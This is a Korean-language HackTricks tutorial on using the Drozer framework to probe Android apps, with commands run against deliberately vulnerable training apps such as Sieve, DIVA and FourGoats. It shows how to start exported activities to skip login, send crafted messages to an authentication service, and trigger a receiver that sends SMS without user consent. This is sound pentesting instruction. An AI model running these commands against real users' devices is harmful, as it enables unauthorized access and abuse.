Drozer Tutorial

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°

ν…ŒμŠ€νŠΈν•  APK

  • Sieve (mrwlabsμ—μ„œ 제곡)
  • DIVA

이 νŠœν† λ¦¬μ–Όμ˜ μΌλΆ€λŠ” Drozer λ¬Έμ„œ pdfμ—μ„œ λ°œμ·Œλ˜μ—ˆμŠ΅λ‹ˆλ‹€.

μ„€μΉ˜

호슀트 내에 Drozer Clientλ₯Ό μ„€μΉ˜ν•©λ‹ˆλ‹€. μ΅œμ‹  λ¦΄λ¦¬μŠ€μ—μ„œ λ‹€μš΄λ‘œλ“œν•˜μ„Έμš”.

pip install drozer-2.4.4-py2-none-any.whl
pip install twisted
pip install service_identity

μ΅œμ‹  λ¦΄λ¦¬μŠ€μ—μ„œ drozer APKλ₯Ό λ‹€μš΄λ‘œλ“œν•˜κ³  μ„€μΉ˜ν•˜μ„Έμš”. ν˜„μž¬ 버전은 μ΄κ²ƒμž…λ‹ˆλ‹€.

adb install drozer.apk

μ„œλ²„ μ‹œμž‘ν•˜κΈ°

AgentλŠ” 포트 31415μ—μ„œ μ‹€ν–‰λ˜κ³  있으며, Drozer Client와 Agent κ°„μ˜ 톡신을 μ„€μ •ν•˜κΈ° μœ„ν•΄ 포트 ν¬μ›Œλ”©μ„ ν•΄μ•Ό ν•©λ‹ˆλ‹€. λ‹€μŒμ€ 이λ₯Ό μˆ˜ν–‰ν•˜λŠ” λͺ…λ Ήμ–΄μž…λ‹ˆλ‹€:

adb forward tcp:31415 tcp:31415

λ§ˆμ§€λ§‰μœΌλ‘œ, μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ„ μ‹€ν–‰ν•˜κ³  ν•˜λ‹¨μ˜ β€œON” λ²„νŠΌμ„ λˆ„λ¦…λ‹ˆλ‹€.

그리고 μ—°κ²°ν•©λ‹ˆλ‹€:

drozer console connect

Interesting Commands

CommandsDescription
Help MODULEμ„ νƒν•œ λͺ¨λ“ˆμ˜ 도움말을 λ³΄μ—¬μ€λ‹ˆλ‹€.
listν˜„μž¬ μ„Έμ…˜μ—μ„œ μ‹€ν–‰ν•  수 μžˆλŠ” λͺ¨λ“  drozer λͺ¨λ“ˆμ˜ λͺ©λ‘μ„ λ³΄μ—¬μ€λ‹ˆλ‹€. μ΄λŠ” μ μ ˆν•œ κΆŒν•œμ΄ μ—†λŠ” λͺ¨λ“ˆμ€ μˆ¨κΉλ‹ˆλ‹€.
shellμ—μ΄μ „νŠΈμ˜ μ»¨ν…μŠ€νŠΈμ—μ„œ μž₯μΉ˜μ—μ„œ λŒ€ν™”ν˜• Linux 셸을 μ‹œμž‘ν•©λ‹ˆλ‹€.
cleanAndroid μž₯μΉ˜μ—μ„œ drozerκ°€ μ €μž₯ν•œ μž„μ‹œ νŒŒμΌμ„ μ œκ±°ν•©λ‹ˆλ‹€.
loaddrozer λͺ…령이 ν¬ν•¨λœ νŒŒμΌμ„ λ‘œλ“œν•˜κ³  순차적으둜 μ‹€ν–‰ν•©λ‹ˆλ‹€.
moduleμΈν„°λ„·μ—μ„œ μΆ”κ°€ drozer λͺ¨λ“ˆμ„ μ°Ύμ•„ μ„€μΉ˜ν•©λ‹ˆλ‹€.
unsetdrozerκ°€ μƒμ„±ν•˜λŠ” λͺ¨λ“  Linux 셸에 μ „λ‹¬ν•˜λŠ” 이름이 μ§€μ •λœ λ³€μˆ˜λ₯Ό μ œκ±°ν•©λ‹ˆλ‹€.
setdrozerκ°€ μƒμ„±ν•˜λŠ” λͺ¨λ“  Linux 셸에 ν™˜κ²½ λ³€μˆ˜λ‘œ 전달될 값을 λ³€μˆ˜μ— μ €μž₯ν•©λ‹ˆλ‹€.
shellμ—μ΄μ „νŠΈμ˜ μ»¨ν…μŠ€νŠΈμ—μ„œ μž₯μΉ˜μ—μ„œ λŒ€ν™”ν˜• Linux 셸을 μ‹œμž‘ν•©λ‹ˆλ‹€.
run MODULEdrozer λͺ¨λ“ˆμ„ μ‹€ν–‰ν•©λ‹ˆλ‹€.
exploitDrozerλŠ” μž₯μΉ˜μ—μ„œ μ‹€ν–‰ν•  수 μžˆλŠ” μ΅μŠ€ν”Œλ‘œμž‡μ„ 생성할 수 μžˆμŠ΅λ‹ˆλ‹€. drozer exploit list
payloadμ΅μŠ€ν”Œλ‘œμž‡μ—λŠ” νŽ˜μ΄λ‘œλ“œκ°€ ν•„μš”ν•©λ‹ˆλ‹€. drozer payload list

Package

μ΄λ¦„μ˜ μΌλΆ€λ‘œ ν•„ν„°λ§ν•˜μ—¬ νŒ¨ν‚€μ§€μ˜ 이름을 μ°ΎμŠ΅λ‹ˆλ‹€:

dz> run app.package.list -f sieve
com.mwr.example.sieve

νŒ¨ν‚€μ§€μ˜ κΈ°λ³Έ 정보:

dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/data/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-2.apk
UID: 10056
GID: [1028, 1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS

Manifest 읽기:

run app.package.manifest jakhar.aseem.diva

νŒ¨ν‚€μ§€μ˜ 곡격 ν‘œλ©΄:

dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable
  • ν™œλ™: μ•„λ§ˆλ„ ν™œλ™μ„ μ‹œμž‘ν•˜κ³  이λ₯Ό μ‹€ν–‰ν•˜λŠ” 것을 방지해야 ν•˜λŠ” μ–΄λ–€ μ’…λ₯˜μ˜ κΆŒν•œμ„ μš°νšŒν•  수 μžˆμ„ κ²ƒμž…λ‹ˆλ‹€.
  • μ½˜ν…μΈ  제곡자: μ•„λ§ˆλ„ 개인 데이터에 μ ‘κ·Όν•˜κ±°λ‚˜ 일뢀 취약점(SQL Injection λ˜λŠ” Path Traversal)을 μ•…μš©ν•  수 μžˆμ„ κ²ƒμž…λ‹ˆλ‹€.
  • μ„œλΉ„μŠ€:
  • 디버깅 κ°€λŠ₯: μžμ„Ένžˆ μ•Œμ•„λ³΄κΈ°

ν™œλ™

λ‚΄λ³΄λ‚΄κΈ°λœ ν™œλ™ ꡬ성 μš”μ†Œμ˜ β€œandroid:exported” 값은 AndroidManifest.xml νŒŒμΌμ—μ„œ **β€œtrue”**둜 μ„€μ •λ©λ‹ˆλ‹€:

<activity android:name="com.my.app.Initial" android:exported="true">
</activity>

내보낸 ν™œλ™ λͺ©λ‘:

dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
com.mwr.example.sieve.MainLoginActivity
com.mwr.example.sieve.PWList

Start activity:

μ•„λ§ˆλ„ ν™œλ™μ„ μ‹œμž‘ν•˜κ³  이λ₯Ό μ‹œμž‘ν•˜λŠ” 것을 방지해야 ν•˜λŠ” μ–΄λ–€ μ’…λ₯˜μ˜ κΆŒν•œ λΆ€μ—¬λ₯Ό μš°νšŒν•  수 μžˆμ„ κ²ƒμž…λ‹ˆλ‹€.

dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

adbλ₯Ό μ‚¬μš©ν•˜μ—¬ 내보낸 ν™œλ™μ„ μ‹œμž‘ν•  μˆ˜λ„ μžˆμŠ΅λ‹ˆλ‹€:

  • PackageName은 com.example.demoμž…λ‹ˆλ‹€.
  • Exported ActivityName은 com.example.test.MainActivityμž…λ‹ˆλ‹€.
adb shell am start -n com.example.demo/com.example.test.MainActivity

Content Providers

이 κ²Œμ‹œλ¬Όμ€ μ—¬κΈ°μ—μ„œ λ„ˆλ¬΄ μ»€μ„œ 당신은 μ—¬κΈ°μ—μ„œ λ³„λ„μ˜ νŽ˜μ΄μ§€λ‘œ μ ‘κ·Όν•  수 μžˆμŠ΅λ‹ˆλ‹€.

Services

내보낸 μ„œλΉ„μŠ€λŠ” Manifest.xml λ‚΄μ—μ„œ μ„ μ–Έλ©λ‹ˆλ‹€:

<service android:name=".AuthService" android:exported="true" android:process=":remote"/>

μ½”λ“œ checkμ—μ„œ handleMessage ν•¨μˆ˜λ₯Ό ν™•μΈν•˜μ„Έμš”. 이 ν•¨μˆ˜λŠ” messageλ₯Ό receiveν•©λ‹ˆλ‹€:

List service

dz> run app.service.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.AuthService
Permission: null
com.mwr.example.sieve.CryptoService
Permission: null

μ„œλΉ„μŠ€μ™€ μƒν˜Έμž‘μš©

app.service.send            Send a Message to a service, and display the reply
app.service.start           Start Service
app.service.stop            Stop Service

예제

app.service.send에 λŒ€ν•œ drozer 도움말을 ν™•μΈν•˜μ„Έμš”:

λ¨Όμ € β€œmsg.what” μ•ˆμ˜ 데이터λ₯Ό μ „μ†‘ν•œ λ‹€μŒ, β€œmsg.arg1β€œκ³Ό β€œmsg.arg2β€œλ₯Ό μ „μ†‘ν•©λ‹ˆλ‹€. μ–΄λ–€ 정보가 μ‚¬μš©λ˜κ³  μžˆλŠ”μ§€ μ½”λ“œ μ•ˆμ—μ„œ 확인해야 ν•©λ‹ˆλ‹€.
--extra μ˜΅μ…˜μ„ μ‚¬μš©ν•˜λ©΄ β€œmsg.replyToβ€œμ— μ˜ν•΄ ν•΄μ„λ˜λŠ” λ‚΄μš©μ„ 전솑할 수 있으며, --bundle-as-objλ₯Ό μ‚¬μš©ν•˜λ©΄ 제곡된 μ„ΈλΆ€μ •λ³΄λ‘œ 객체λ₯Ό μƒμ„±ν•©λ‹ˆλ‹€.

λ‹€μŒ μ˜ˆμ œμ—μ„œ:

  • what == 2354
  • arg1 == 9234
  • arg2 == 1
  • replyTo == object(string com.mwr.example.sieve.PIN 1337)
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj

Broadcast Receivers

Android κΈ°λ³Έ 정보 μ„Ήμ…˜μ—μ„œ Broadcast Receiverκ°€ 무엇인지 확인할 수 μžˆμŠ΅λ‹ˆλ‹€.

이 Broadcast Receiversλ₯Ό λ°œκ²¬ν•œ ν›„μ—λŠ” μ½”λ“œλ₯Ό 확인해야 ν•©λ‹ˆλ‹€. onReceive ν•¨μˆ˜μ— νŠΉλ³„νžˆ μ£Όμ˜ν•˜μ„Έμš”. 이 ν•¨μˆ˜λŠ” μˆ˜μ‹ λœ λ©”μ‹œμ§€λ₯Ό μ²˜λ¦¬ν•©λ‹ˆλ‹€.

λͺ¨λ“  broadcast receivers 감지

run app.broadcast.info #Detects all

μ•±μ˜ λΈŒλ‘œλ“œμΊμŠ€νŠΈ μˆ˜μ‹ κΈ° 확인

#Check one negative
run app.broadcast.info -a jakhar.aseem.diva
Package: jakhar.aseem.diva
No matching receivers.

# Check one positive
run app.broadcast.info -a com.google.android.youtube
Package: com.google.android.youtube
com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver
Permission: null
com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver
Permission: com.google.android.c2dm.permission.SEND
com.google.android.apps.youtube.app.PackageReplacedReceiver
Permission: null
com.google.android.libraries.youtube.account.AccountsChangedReceiver
Permission: null
com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver
Permission: null

Broadcast μƒν˜Έμž‘μš©

app.broadcast.info          Get information about broadcast receivers
app.broadcast.send          Send broadcast using an intent
app.broadcast.sniff         Register a broadcast receiver that can sniff particular intents

λ©”μ‹œμ§€ 보내기

이 μ˜ˆμ œμ—μ„œλŠ” FourGoats apk Content Providerλ₯Ό μ•…μš©ν•˜μ—¬ μ‚¬μš©μžμ˜ ν—ˆκ°€ 없이 μž„μ˜μ˜ SMSλ₯Ό 비프리미엄 λͺ©μ μ§€λ‘œ 보낼 수 μžˆμŠ΅λ‹ˆλ‹€.

μ½”λ“œλ₯Ό 읽어보면, β€œphoneNumberβ€œμ™€ β€œmessage” λ§€κ°œλ³€μˆ˜λ₯Ό Content Provider에 전솑해야 ν•©λ‹ˆλ‹€.

run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!"

Is debuggeable

μƒμ‚°μš© APKλŠ” μ ˆλŒ€ 디버깅 κ°€λŠ₯ν•΄μ„œλŠ” μ•ˆ λ©λ‹ˆλ‹€.
이것은 μžλ°” 디버거λ₯Ό μ‹€ν–‰ 쀑인 μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ— μ—°κ²°ν•˜κ³ , λŸ°νƒ€μž„μ—μ„œ κ²€μ‚¬ν•˜κ³ , 쀑단점을 μ„€μ •ν•˜κ³ , λ‹¨κ³„λ³„λ‘œ μ§„ν–‰ν•˜λ©°, λ³€μˆ˜ 값을 μˆ˜μ§‘ν•˜κ³  심지어 λ³€κ²½ν•  수 μžˆμŒμ„ μ˜λ―Έν•©λ‹ˆλ‹€. InfoSec institute has an excellent article on digging deeper when you application is debuggable and injecting runtime code.

μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ΄ 디버깅 κ°€λŠ₯ν•  λ•Œ, λ§€λ‹ˆνŽ˜μŠ€νŠΈμ— λ‚˜νƒ€λ‚©λ‹ˆλ‹€:

<application theme="@2131296387" debuggable="true"

λͺ¨λ“  디버깅 κ°€λŠ₯ν•œ μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ„ Drozer둜 찾을 수 μžˆμŠ΅λ‹ˆλ‹€:

run app.package.debuggable

Tutorials

More info

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°